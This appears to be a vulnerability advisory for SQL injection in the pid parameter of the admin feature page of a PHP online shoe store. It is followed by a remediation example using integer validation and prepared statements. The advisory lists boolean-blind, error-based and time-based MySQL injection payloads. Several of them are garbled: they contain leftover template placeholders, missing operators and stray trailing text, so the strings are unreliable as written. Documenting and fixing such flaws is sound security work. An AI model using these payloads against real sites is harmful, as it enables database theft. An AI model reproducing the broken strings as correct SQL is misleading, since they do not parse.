**Key vulnerability information**

- **Affected product:** Retro Basketball Shoes Online Store
- **Vulnerable file:** /admin/admin_feature.php
- **Affected version:** V1.0
- **Vulnerability type:** SQL Injection
- **Root cause:** A SQL injection vulnerability exists because parameters are not properly escaped in the SQL query.

**Example payloads**

Boolean-based blind

- Title: MySQL BLIND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (AND)
- Payload: `pid=68129' AND [SUCCE$(CASE WHEN (ASCII(SUBSTR((SELECT CONCAT(0x74657374),[INFERENCE] FROM [TABLE])),[OFFSET],1))>[CHAR]) THEN RAND()>1 ELSE 01 END)]--`

Error-based

- Title: MySQL >= 5.0.12 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: `pid=68129' AND (SELECT 1234 FROM(SELECT COUNT(),CONCAT(0x74657374,(SELECT (ELT(68129=68129))),0x74657374,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--`

Time-based blind

- Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
- Payload: `pid=68129' AND (SELECT 3839 FROM (SELECT(SLEEP(5)))V())#-- +kKlSome+where=l1154&tracks=`

This information shows that the online store project contains a SQL injection vulnerability; an attacker can use specific payloads to exploit it for data disclosure or other malicious operations.
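One way to close the root cause described above, as an added example that is not code from the project or from the original report: validate `pid` as an integer and bind it as a parameter instead of concatenating it into the SQL text. The helper name `find_product`, the `product` table and its columns are assumptions, and an in-memory SQLite database (via PDO) stands in for the store's MySQL database so the snippet runs offline.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: look up a record by the `pid` request parameter.
// Table and column names (`product`, `id`, `name`) are assumptions.
function find_product(PDO $db, mixed $rawPid): ?array
{
    // 1. Allow-list: pid must be a positive integer and nothing else.
    $pid = filter_var($rawPid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($pid === false) {
        return null; // quotes, comments, sub-selects etc. never reach the database
    }

    // 2. Bound parameter: the value is sent as data, not as part of the SQL text.
    $stmt = $db->prepare('SELECT id, name FROM product WHERE id = :pid');
    $stmt->bindValue(':pid', $pid, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO product (id, name) VALUES (68129, 'Sample shoe')");

// Constructed inputs: a legitimate id, the quote-breaking prefix shared by
// the payloads in the report, and a few malformed values.
$inputs = ['68129', "68129'", '', null, '-1', 'abc'];
foreach ($inputs as $in) {
    $row = find_product($db, $in);
    printf("%-12s => %s\n", var_export($in, true), $row ? $row['name'] : 'rejected / not found');
}
```

Because the file sits under `/admin/`, the same handler should also enforce an authenticated admin session before it touches the database; parameter binding fixes the injection, not access control.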